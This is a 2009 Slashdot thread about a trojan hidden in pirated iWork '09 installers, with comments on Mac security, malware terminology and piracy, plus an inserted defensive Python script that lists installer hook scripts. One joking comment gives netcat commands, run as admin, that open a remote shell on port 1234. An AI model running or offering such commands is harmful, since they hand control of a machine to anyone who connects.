
Trojan Hides In Pirated Copies of Apple iWork '09

Posted by timothy
from the good-reason-not-to-pirate-software dept.
CWmike writes "Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites contain a Trojan horse that hijacks Macs and leaves them open to further attack, a security company said yesterday. The 'iServices.a' Trojan hitchhikes on iWork '09's installer, said Intego, which makes Mac security software. 'The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password,' Intego said in a warning. Once installed, the Trojan "phones home" to a malicious server to notify the hacker that the Mac has been compromised, and to await instructions."

  • by Majik Sheff (930627) on Thursday January 22, 2009 @10:42PM (#26570071) Journal

    The iPwn!

    • by guitarpy (1154687) on Friday January 23, 2009 @12:14AM (#26570797)
      I'd like to take this opportunity to welcome mac users to the pc world...I mean really....pirated software with a virus...who would have seen that one coming?
      • by darkpixel2k (623900) <aaron@heyaaron.com> on Friday January 23, 2009 @12:42AM (#26570955) Homepage

        I'd like to take this opportunity to welcome mac users to the pc world...I mean really....pirated software with a virus...who would have seen that one coming?

        I just wish someone would do this for the Linux world. I've tried nearly every ISO download under "Applications -> Unix" on The Pirate Bay, but everything seems to be *legal*.

        It won't be the year of Linux on the Desktop(tm) until you can download pirated linux applications from The Pirate Bay complete with virii and rootkits.

      • Pirates (Score:5, Insightful)

        by shmlco (594907) on Friday January 23, 2009 @01:40AM (#26571247) Homepage

        Not to troll, but as far as I'm concerned anyone who pirates software deserves it...

        • Re: (Score:3, Funny)

          by kalirion (728907)

          And does everyone who purchases a dime bag off the street deserve to have it laced with crack?

    • Re: (Score:3, Funny)

      by kalirion (728907)

      What's the world coming to? I mean if you can't even trust a warez provider...

  • by Anonymous Coward on Thursday January 22, 2009 @10:43PM (#26570079)
    Why not download the Trial version and unlock it with one of the million serials out there?
  • Of course (Score:5, Insightful)

    by ColdWetDog (752185) * on Thursday January 22, 2009 @10:43PM (#26570085) Homepage

    About Intego

    Intego develops and sells desktop Internet security and privacy software for Macintosh.

    • Re:Of course (Score:5, Interesting)

      by 0100010001010011 (652467) on Thursday January 22, 2009 @10:57PM (#26570225)

      LittleSnitch [obdev.at] is one of my favorite security programs. Shows any outgoing connections and I can allow for that session, once, or forever and to just that port, any port, that host, that host and port.

      Does anyone have a torrent to a file with the trojan? I'd like to open the .pkg and look at it. It's surprisingly easy to look at the 'install' files. Right click on the pkg and open a few folders and look for pre-flight & post-flight scripts (which can be written in about any language). .pkgs are fun little things.
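
The pre-flight and post-flight scripts mentioned in the comment above can also be listed without opening the folders by hand. The following is an added example, not part of the original comment or of any tool named on this page: it walks a bundle-style .pkg/.mpkg directory and reports every script the installer would run automatically, reading the files but never executing them. The hook names are those used by bundle-style Installer packages; the sample package and its layout are constructed for the demo.

```python
import os
import stat
import tempfile

# Hook names that bundle-style Installer packages run automatically.
INSTALL_HOOKS = {"preflight", "postflight", "preinstall", "postinstall",
                 "preupgrade", "postupgrade", "InstallationCheck", "VolumeCheck"}


def interpreter_of(path):
    """Return the shebang interpreter, or a label when the file has none."""
    with open(path, "rb") as fh:
        head = fh.read(256)
    if head.startswith(b"#!"):
        return head[2:].split(b"\n", 1)[0].decode("utf-8", "replace").strip()
    return "no shebang (compiled binary or data)"


def find_install_scripts(pkg_root):
    """Walk a .pkg/.mpkg bundle and list every auto-run hook, without running it."""
    findings = []
    for dirpath, _dirs, files in os.walk(pkg_root):
        for name in files:
            if name not in INSTALL_HOOKS:
                continue
            full = os.path.join(dirpath, name)
            findings.append({
                "path": os.path.relpath(full, pkg_root),
                "hook": name,
                "interpreter": interpreter_of(full),
                "executable": bool(os.stat(full).st_mode & stat.S_IXUSR),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_pkg(parent):
    """Create a constructed, harmless sample bundle for the demo."""
    root = os.path.join(parent, "Sample.mpkg")
    hooks = {
        "App.pkg": ("postflight", "#!/bin/sh\necho 'install finished'\n"),
        "Helper.pkg": ("preflight", "#!/usr/bin/perl -w\nprint \"checking\\n\";\n"),
    }
    for pkg, (hook, body) in hooks.items():
        res = os.path.join(root, "Contents", "Packages", pkg, "Contents", "Resources")
        os.makedirs(res)
        script = os.path.join(res, hook)
        with open(script, "w") as fh:
            fh.write(body)
        os.chmod(script, 0o755)
        # A non-hook file that the scan must ignore.
        with open(os.path.join(res, "Description.plist"), "w") as fh:
            fh.write("<plist/>\n")
    return root


def scan_sample():
    """Build the constructed sample in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_install_scripts(build_sample_pkg(tmp))


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['path']}: {f['interpreter']} (executable={f['executable']})")
```

Pointing `find_install_scripts` at a downloaded package directory gives the list of files worth reading before the installer is ever given an administrator password.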

      • Re:Of course (Score:4, Insightful)

        by calmofthestorm (1344385) on Thursday January 22, 2009 @11:08PM (#26570311)

        It's especially nice if such monitoring software is not "on the radar" of malware sites, since they could include a workaround for such software, as is frequently done for Norton and Symantec on Windows.

      • Re: (Score:3, Informative)

        by biocute (936687)

        I can confirm LittleSnitch works like a charm.

        The site above doesn't provide free download, so I went to an abundantware site called ThePirateBay.org.

        I'm surprised this little germ even comes with pre-whitelist feature and several connections that I've never heard of have already been pre-allowed.

        Truly a time-saver.

  • cynicism (Score:5, Insightful)

    by bwthomas (796211) <bwthomas.gmail@com> on Thursday January 22, 2009 @10:45PM (#26570107)

    Sometimes I wonder if companies that create security software aren't sometimes guilty of either creating or funding the creation of viruses, trojans, worms, &c. simply to justify their own existence.

    Is that cynical?

    • Re:cynicism (Score:5, Insightful)

      by zappepcs (820751) on Thursday January 22, 2009 @11:08PM (#26570307) Journal

      They certainly use virus news to justify their existence and the cost of their products. The fact that they exist is tantamount to admitting that no OS can be fully secured.

      The harder anti-virus vendors bleat on about how good their product is, the more bragging rights a virus writer will get for walking around the security... among their own crowd. It's more or less a case of putting up a wall and telling the world, there, you can't get past this wall now.

      The real trouble with anti-virus vendors is that they tend to convince people that once their product is installed, the end user's pc is safe. It is NOT, and won't ever be. Some of the best virus programs in the world are still out in the wild, running as they were intended to run, collecting and passing information as they are supposed to. Since they are not destructive to normal computer activity, they go undetected. Don't say that such does not exist... I know you have not done forensics on all existent computers. Every now and then we hear about some corporate espionage or attacks from state military groups etc. All of this is just hinting at the real problems: The virus programs we don't know about.

      Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.

      Soon, you'll need a multicore CPU just to handle real time scanning. It's a giant whack-a-mole game. Always will be.

      • Re: (Score:2, Informative)

        by LiENUS (207736)

        Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.

        Presumably you mean worm programs not virus programs. Virus programs are typically very obvious as they modify the executables on the system they infect. These modifications are easily detected as the checksums (md5, crc, whatever) change and someone notices.

        • Re:cynicism (Score:5, Interesting)

          by zappepcs (820751) on Friday January 23, 2009 @12:44AM (#26570967) Journal

          Actually, IMO we are in need of another category of malicious software. Social engineering allows code writers to get their code run by the user in a way that is neither stealthy nor without their knowledge. It runs as a user program, and did not necessarily 'infect' the machine, yet is a virus by the definition that it has modified an executable. So we need either a new term, or be satisfied that the generic use of the term 'virus' fits such code.

          An example would be a screen saver that does its work when the computer is idle and the screen saver itself has been run on the user's command to do so. That group of software that claims to be scanning software which does more than look for malicious code is also in this category. It's becoming quite confusing, and at any turn unvalidated code can be malicious. Many end users are unable to know the difference without much more training. Social engineering makes it fairly simple to get users to run malicious code.

          We've seen people repackage OOo software and sell it. It won't be long before we discover such tactics used to deliver malicious code. Would that be a virus or a worm?

          You see, my favorite scenario for malicious code is quite simple... spreads like a virus, then sits and waits patiently for the moment that it finds itself on a machine whose user is 'bill gates' (as an example) then every time the screen saver is activated, it searches the drive for the oldest .xls or .doc files and deletes two of them that are at least 45 days since last access. Every 17th time (or follow a Fibonacci number sequence) the screen saver is activated, it searches for Symantec installations and deletes the current virus definition file. Every 6th boot, it loads a key logger which looks for a select set of certain bank URLs. Every time you plug in a USB drive, it copies itself to the USB device if the screen saver is activated. You see, there are many ways to create hard to find problems. It won't be long before we are seeing them.

    • As long as there are crackers without girlfriends in the world, they don't need to.

      But to fuel your paranoia, maybe *that*'s why they sometimes used to offer jobs to prominent crackers;)

    • No, I've thought that for a long time. But I showed them, I simply downloaded a cracked version of their antivirus software! Sure, my computer promptly stopped working, but I'm sure that would have happened anyway. Correlation is not causation.

    • by Klootzak (824076)

      Is that cynical?

      Actually, it's called Critical or Analytical thinking [wikipedia.org]...

      Cynicism is a negative perception of something that doesn't necessarily involve evaluation of the topic in the larger context, something like:
      "There is no good left in the world, people will never change, and I might as well become evil too!".
      ^^^^That's some pretty bad cynicism (or pessimism) though, hopefully most people don't ever get that cynical ;).

  • by pHatidic (163975) on Thursday January 22, 2009 @10:47PM (#26570119)

    If only Apple hadn't stripped out the DRM this would have never happened!

  • Haven't you seen the ads? Mac OS X doesn't get viruses. This story is a complete fabrication, bankrolled by Microsoft, created to instil fear in The Perfect Operating System. Please link real stories next time.
    • by falcon5768 (629591) <Falcon5768@@@comcast...net> on Thursday January 22, 2009 @10:58PM (#26570239) Journal
      Who's talking about a virus? I don't see ANYTHING about a virus. I DO see a story about a TROJAN. Whole different ball of wax there. No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admin password to install it.
      • by onecheapgeek (964280) on Thursday January 22, 2009 @11:03PM (#26570275) Journal
        And how long has it been since a true virus was attacking windows? It's always trojans, worms or adware and has been for several years.
        • by AKAImBatman (238306) * <akaimbatman AT gmail DOT com> on Thursday January 22, 2009 @11:12PM (#26570337) Homepage Journal

          And how long has it been since a true virus was attacking windows?

          Just this week. [nytimes.com]

          It's always trojans, worms or adware and has been for several years.

          A worm differs from a virus only in so much that it doesn't need to copy itself into a system program. For all intents and purposes however, the difference between the two terms is antiquated.

        • As a virus requires user interaction such as double clicking a email attachment and worms require no user interaction and auto install due to unpatched vulnerabilities in the OS, I would think worms are worse. The last time a major worm hit over 9 million Windows users was Jan 20th 2009. http://www.techtree.com/India/News/Windows_Virus_Infects_9_Million/551-98002-582.html [techtree.com] Back on topic, Macrumors reports that the trojan is already receiving instructions and participating in Denial of Service attacks. They a
        • by ceoyoyo (59147)

          Yes. Worms. Nobody ever hears about a trojan attacking Windows. It's simply not news.* Worms are the really evil ones, because they spread with no intervention, over the network, meaning they can infect a huge number of machines very quickly.

        • Re: (Score:2, Funny)

          by troll8901 (1397145)

          And how long has it been since a true virus was attacking windows?

          Every single day. Truly. They do that in building construction and renovation all the time.

          ("You move to an area and you multiply and multiply ... There is another organism on this planet that follows the same pattern. Do you know what it is? A virus.")

          It's always trojans, worms or adware and has been for several years.

          I don't think big wooden horses can fit through a window, although little crawling worms and poster advertisements can.

        • And how long has it been since a true virus was attacking windows? It's always trojans, worms or adware and has been for several years.

          Well, let's just say that we're reaching a point where it's easier to take advantage of users than it is to take advantage of code. Well, really, it has nothing to do with code, it's more just really really easy to make users look stupid. Example: Antivirus2009.exe

      • No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admin password to install it.

        I disagree. Systems can be and have been designed to make getting a trojan running and useful a very, very difficult feat of social engineering or even impossible without hacking the machine in advance. Right now these systems are fairly restricted in their deployment and none are mainstream on consumer PCs, but that doesn't mean mainstream OS's can't catch up and both OS X and Linux are working on technologies that can help mitigate trojans.

        • by Sir_Lewk (967686)
          Bullshit. A proper trojan differs from regular programs only in that it convinces the user it's meant for something else.
  • by Anonymous Coward on Thursday January 22, 2009 @10:48PM (#26570129)

    That it is the easiest trojan to use ever. Bravo, Apple.

  • by Dreadneck (982170)
    Since when does a PEBKAC error count as news? If you're idiot enough to install pirated software then you deserve what you get - and absolutely nobody can protect a computer system against user stupidity.
    • Since when does a PEBKAC error count as news?

      I take exception to your assertion. Just because a user runs a program does not mean that program should automatically be able to connect to a remote server without their permission or notification. That's the case for almost all current, mainstream OS's but that does not mean it is a good design.

      Second, this is news because it is a trojan reportedly in the wild for a platform where there are very few trojans circulating, especially trojans that are not targeting a specific person or company. People want to

      • Re: (Score:2, Insightful)

        by Dreadneck (982170)
        From the article:

        The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password

        As I said, it's a PEBKAC error. If you give an installer your admin password it can do whatever it pleases. Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password. No security paradigm will ever be invented that cannot be undermined by human stupidity.

        • Re: (Score:3, Insightful)

          As I said, it's a PEBKAC error. If you give an installer your admin password it can do whatever it pleases.

          And if you read my post, I'm telling you that is a design flaw in the OS. On a well designed OS, the software has more granularity of permission than "can do everything including connect to random servers" and "can't install". Apple seems to agree with me since they added an ACL framework to restrict applications with a finer level of permissions in the last version, although it is only used for a small subset of applications so far.

          Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password.

          I think installing pirated software is unethical and risky, but not necessari

      • by Trogre (513942)

        iPhone... consumer appliance.

        I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

        • iPhone... consumer appliance. I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

          Software for the iPhone is centrally distributed by Apple and uses a signing framework to check packages (regular OS X has it too but it is largely unused). So how is someone going to post fake software with a trojan in it? If they manage to slip one past Apple's review, as soon as it is found Apple can revoke the signature for all copies deactivating them. Software on the iPhone runs in a sandbox and generally has limited permissions making it hard to root. All of these can be overcome, but it is really rea

    • I'm a lot more concerned about the legitimate and semi-legitimate companies that install spyware and malware with their software. At least when this kind of crap goes up on a torrent site, there are 7 posts within an hour or two warning other users that there's malware in the program. Whereas when a Microsoft or Sony sets you up the bomb they spend months denying there's a problem first. That still doesn't excuse the lazy user who installs whatever without checking it out first, but I don't think it's ac

  • by JoshuaZ (1134087) on Thursday January 22, 2009 @10:50PM (#26570157) Homepage
    If Apple were evil they could deliberately put hacked versions onto filesharing sites. More seriously, this is a good example of why even pirating software is really not a good idea. Unless you know exactly who you are downloading from you don't know what you are getting. Very little commercial software has nice little checksums or hashes that are easily available for you to verify. Downloading pirated software is a bit like having unprotected sex with a stranger. It might feel real good now, but you are going to regret it later.
  • But... (Score:2, Interesting)

    by alienunknown (1279178)
    From the article:

    Late last year, in fact, when Apple revised an online recommendation that Mac users consider running antivirus software, the move drew lots of attention.

    Most antivirus programs on os x actually scan for Windows viruses only, and are totally useless against almost all os x malware. The only software vendor that I know of that makes anti-malware programs for native OS X malware is Intego. Intego make great software and are mentioned in this article, but what about all the mac users out there who get a mac virus scanner that only scans for windows viruses? A lot of people are being duped.

  • "TrojanDevKit.DMG" - available only to 'special developers'. From the EULA: "Only to be used on occasions when our IP is getting ripped to the point we get irritated. Break glass in case of emergency."
  • Lol viruses? Get a Mac. Oh wait.
  • I always thought that torrents seem an ideal mechanism to spread viruses. If this becomes epidemic it could very well totally cripple the P2P community.

    With pirated software this risk can be mitigated if you have a verified trustworthy hash code of the untampered original version. On the other hand, if there is an exploitable vulnerability in a popular codec, movie torrents could become a massive security problem (obviously not for enterprise computing but the already more vulnerable home user).

  • by WiiVault (1039946) on Thursday January 22, 2009 @11:49PM (#26570615)
    I don't steal software, ever, but it is a well known fact (among Mac users) that iWork can be downloaded direct from Apple. All it takes is a valid serial number and you are ready to go. Why the heck would anybody bother firing up a torrent?
  • How is this news? (Score:2, Insightful)

    by mysidia (191772)

    Software programs downloaded from third-party pirate sites can contain trojans.

    Film at 11!

    It's not like trojans are unusual, they are commonplace, and a risk for every computer user who thinks about running things from untrusted sources.

  • Please execute the following as admin, type your password as requested:

    sudo nc -l -p1234 -d -e bash-L

    on windows:

    nc -l -p1234 -d -e cmd.exe -L

    Oh noes, I ownz yoo box now.

    (similar things can be done with reverse ssh tunneling but you get the point)

  • by night_flyer (453866) on Friday January 23, 2009 @10:49AM (#26575085) Homepage

    I'm running windows...
